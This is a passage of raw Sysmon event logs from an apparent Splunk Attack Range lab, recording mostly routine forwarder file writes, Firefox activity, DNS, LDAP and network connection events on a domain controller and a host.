Firefox\xul.dll+2205190|C:\Program Files\Mozilla Firefox\xul.dll+2216ecd|C:\Program Files\Mozilla Firefox\xul.dll+22213c8|C:\Program Files\Mozilla Firefox\xul.dll+2220a14|C:\Program Files\Mozilla Firefox\xul.dll+220bbd6|C:\Program Files\Mozilla Firefox\xul.dll+40976|C:\Program Files\Mozilla Firefox\xul.dll+3f85a|C:\Program Files\Mozilla Firefox\xul.dll+120351f|C:\Program Files\Mozilla Firefox\xul.dll+3f65e|C:\Program Files\Mozilla Firefox\xul.dll+dabd27|C:\Program Files\Mozilla Firefox\nss3.dll+fac5a|C:\Program Files\Mozilla Firefox\nss3.dll+ee441|C:\Windows\System32\ucrtbase.dll+1fb80 18141800x80000000000000001051998Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-ConnectPipe2021-07-12 08:00:06.324{466BC892-3462-60E8-100C-00000000CF01}8944\chrome.7548.374.160296821C:\Program Files\Mozilla Firefox\firefox.exe 17141700x80000000000000001051997Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-CreatePipe2021-07-12 08:00:06.324{466BC892-57B0-60E8-6810-00000000CF01}7548\chrome.7548.374.160296821C:\Program Files\Mozilla Firefox\firefox.exe 23542300x80000000000000001052003Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:07.704{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=84658BC00FB138D7C8086BD6D42BF8F0,SHA256=41B1F5557620E8461F25304996730B88430C1759CD81E8F40E05D1EC18D3DAE2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052004Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:08.723{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B2283477A49C7BE8CC58E820AAC39C49,SHA256=4B887699FCF4A71AB20B29C8F873C7D59D690ADF175CC5F8E178C04E935A14DC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808967Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:08.012{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CDD074868A9CA0B7F48C70BB4C8EC6E3,SHA256=5E8DF8C144220CAC12EFE1C85F6DD08B13E38EDC3685028FDC0F5AB2707A78FD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052006Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:09.738{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A5D0ECC7A299CE7F2878910C1C905474,SHA256=2D114F3CA7A1B7580C9DECFDF6B35270C6F76753277692E6C80350509B7B20F3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808968Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:09.027{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=451DE62BDA1502DB8BE2D28763CB05C9,SHA256=32AEA86D19B93F46B33576D85BCAA7A65731920EDCB6A9011A1D41A708625D77,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001052005Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:01.675{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51142-false10.0.1.12-8000- 23542300x80000000000000001052007Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:10.753{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=48B79506813E90C6322079A8D866E32C,SHA256=CFABB85B0F850231145840160707692278B3068B655270CDB2E36A5C79D52B29,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000808970Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:09.379{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57366-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000808969Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:10.043{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8EFC7244351D0D4267F0C58FAB3EB3F6,SHA256=F5E1CBA9A2F56908ED175B48F53D63FF705B417F31025D711B3BCA287F359331,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052008Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:11.783{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=911008B6B8230E3A2241B0D67D031DDC,SHA256=54770EE4A85E895A517639E2E7A464830507C3593A9737D9923711BCF19057B2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808971Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:11.074{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D3690042BB68F4769521B03BA6B5EAED,SHA256=03D3001EBFA820997E1FF703DD4B5C54B4EE7C57F54FE6465402B320F26DCB10,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052011Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:12.801{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=80AAA955762039F980CDF10C5DF97C90,SHA256=7197D0B1DEA3B6400A52BC5E7DEA943AF29369E4514BF849F2C8DC52A2A42119,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808972Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:12.121{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=39CBB48C76964C3D13BC927C10A4B4E0,SHA256=64E06FA2823334258599B27DAA42DE302118DD6348253EFB96392A8D78A9ED45,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001052010Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:12.420{466BC892-3462-60E8-100C-00000000CF01}8944C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\SiteSecurityServiceState.txt2021-07-09 11:40:00.447 23542300x80000000000000001052009Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:12.420{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\SiteSecurityServiceState.txtMD5=A46594CAB1E06DBA640EA339E282546B,SHA256=67CBC2A8958F6B86D2D897756135966143B6B46A374E53F59B9319DA5AC55F19,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052012Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:13.818{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DEBC1B32636EFC5E3AF50B2880EE7C39,SHA256=3DF509D8AF376E2160A3EFBF1ED0B1290C45F080542D8EF37CAD6C869E8D5CE6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808973Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:13.199{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=31BC499CF9A892E63D0D6E04E50121C0,SHA256=84C563E860CF7212D35D23A347B315452BAF29D5414841E345BC332BBC600852,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052013Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:14.833{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FC22514186EE1BB401870AD4499B34CF,SHA256=7EAA7949827F34FD5AEE7125F89532266AA13EB512E0709BA02057CEE02B3A44,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808974Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:14.246{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AB61982D79A1D49D981EA52DC2766D1F,SHA256=90E90A8DC200038059F2A851AD936D1FDF4008137077F46E753A10289261B024,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052019Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:15.850{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=483C84A3FA991E7471E9BCDF13DF6693,SHA256=138E89F0198E2D1E3D0152EB58FCED0277495DC4C66530185F2903ACBAA9FBD2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808975Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:15.290{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=243B422B6A2C18D68703EA9BCE08E234,SHA256=9C5DBB0E34A4F966FB346E9764E62807FFDBD9A553E4E402E236DEDB9AA197DA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052018Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:15.481{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F8DEAA4DD6676A1438A4C4E02F64462E,SHA256=AB2F7064D4858C91C72FFC8247304BC178E67DE3C67A538C936C37DC32636609,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052017Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:15.481{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7D785BE59207A68343C99C24550667EF,SHA256=A99372636DCF85E0F387EA27F09CE8D2D132CBD95CE30E95608DB98E737AA93F,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001052016Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:08.010{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local51144-true0:0:0:0:0:0:0:1win-dc-890.attackrange.local389ldap 354300x80000000000000001052015Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:08.010{466BC892-02BC-60E8-2600-00000000CF01}2864C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local51144-true0:0:0:0:0:0:0:1win-dc-890.attackrange.local389ldap 354300x80000000000000001052014Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:07.631{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51143-false10.0.1.12-8000- 23542300x80000000000000001052026Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:16.851{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9CA7DAC2E703DAD14EE1F8BB17C2DB1C,SHA256=623EC6399C2CCC43EE4AF9B8B60CE16258BAD28B2B7EBE058D72CA5E26DB000A,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000808977Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:15.282{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57367-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000808976Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:16.322{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=189ABE742354A7FD75C4E47C14CB9353,SHA256=22D6315839AE99DF4B54AFA9B74C9A52247979CFD0909184EB881EAB0144E630,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001052025Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:08.734{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local53365- 354300x80000000000000001052024Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:08.734{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local57677- 354300x80000000000000001052023Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:08.734{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local53248- 354300x80000000000000001052022Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:08.733{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local63533- 354300x80000000000000001052021Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:08.731{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local59964- 354300x80000000000000001052020Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:08.731{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local59988- 23542300x80000000000000001052027Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:17.866{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=81465426CF853300D548DE2EF890EEBA,SHA256=BFFC7AAA96D7BD032345FD9C9B0311DAFA7EC1F24EE9EC31F4F5D9D9BBCB8E4A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808978Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:17.337{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DF5EF214E8CF4FA46E77F3425ACE35A3,SHA256=6A2C4252403A43C77E8E50CFE1D43DB610989B24CB5ED41F4F5C5D1D2C3B7C95,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052029Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:18.883{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=970AD574099F350E8085CE52814F75EF,SHA256=47F9CAC9B85DCF71E2A5A73C2BB0DF57D651D1DF8789C94A8767B8DC4B5CE0A5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808979Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:18.353{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B74B9FDD9D8E6290BE614A346DA810A3,SHA256=4E73E11545D57B5809A85F58A8FDD66A85AA6C2FB2222DEC25FB05549A1E66B6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052028Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:18.483{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\storage\default\https+++twitter.com\idb\1046228012scyn.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052030Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:19.901{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6581A8BBE17944C5576298846DA2C8D2,SHA256=9C1E933F38D0F0DDA749BB4163E48ADD4FFD8D10D4F231F151B3D8FB163A49E1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808980Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:19.353{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=676FAEF6BDE9D9D095FA0C6646149335,SHA256=52BE6898E3C584B8BA5BABCE3B3729DC0EFEA618CDA8C67C82956D10C38C4E74,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052032Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:20.949{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B107C3B6812334B2F18C84B686D85BFC,SHA256=B5840B861D953389F9617EC9A6A57C7FEB2DE16A2D337F3F9E7DD4229FE89623,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808982Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:20.697{0C1E0330-050B-60E8-9B00-00000000D001}1020NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=DD4D1D185AB4AED8A391DDEB7814ED87,SHA256=CA570F672172721E4189F1D4FCAE899B45A155271730C13B6A88FE6BC47AB312,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808981Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:20.368{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C2185CACFC64A75DB89E4A43546061E2,SHA256=0317B546F9F42E7491B7DCC656485CAA00CD1F5B93FC946883FE322B2673DB98,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001052031Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:12.717{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51145-false10.0.1.12-8000- 23542300x80000000000000001052034Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:21.980{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C33197E1F11DBB9042299ADE4DA49505,SHA256=C03EF019461AC2C1D015247FBF28A690650CC9D6C0561CE579D93BC1005C9689,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000808984Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:20.829{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57368-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 23542300x8000000000000000808983Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:21.415{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5C7BA075B10533841AD8C90637FE1890,SHA256=35F74F7C4754552D3D62B8A4879E309AF0190F2E7C9B47AE457E4138AE940F8E,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001052033Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:13.031{466BC892-02AF-60E8-0F00-00000000CF01}360C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse194.156.88.187chabka-hosting.com58022-false10.0.1.14win-dc-890.attackrange.local3389ms-wbt-server 23542300x80000000000000001052035Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:22.983{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CD15BE3E0D48CA0B5272A31B8908FA07,SHA256=0A190A8D19EB54C1CEB245A75EFB9ECB1F8C7A4A26EC21CC56EF0A53E68572AB,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000808986Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:21.298{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57369-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000808985Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:22.447{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E0073C6B0744B791CBC289BEB3F99B7B,SHA256=F920AC1DD85C2E34CA74000E8450FC483A67F0D2F096506D6EAD7DD394BB061B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052036Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:23.984{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 